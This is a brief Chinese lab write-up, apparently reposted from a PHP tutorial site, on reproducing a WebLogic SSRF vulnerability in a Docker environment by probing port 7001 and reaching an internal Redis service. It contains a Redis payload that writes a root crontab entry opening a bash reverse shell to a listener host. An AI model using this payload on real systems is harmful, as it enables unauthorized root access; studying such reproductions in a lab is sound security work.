docker安裝及建置環境教學:https://www.freebuf.com/sectool/252257.html
存取7001埠
發現是個連接,這就可能存在ssrf了
存取不存在的連接埠傳回 could not connect over HTTP
#存取存在的連接埠回傳狀態碼
#存取內網
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
以上是如何實現Weblogic SSRF漏洞復現的詳細內容。更多資訊請關注PHP中文網其他相關文章!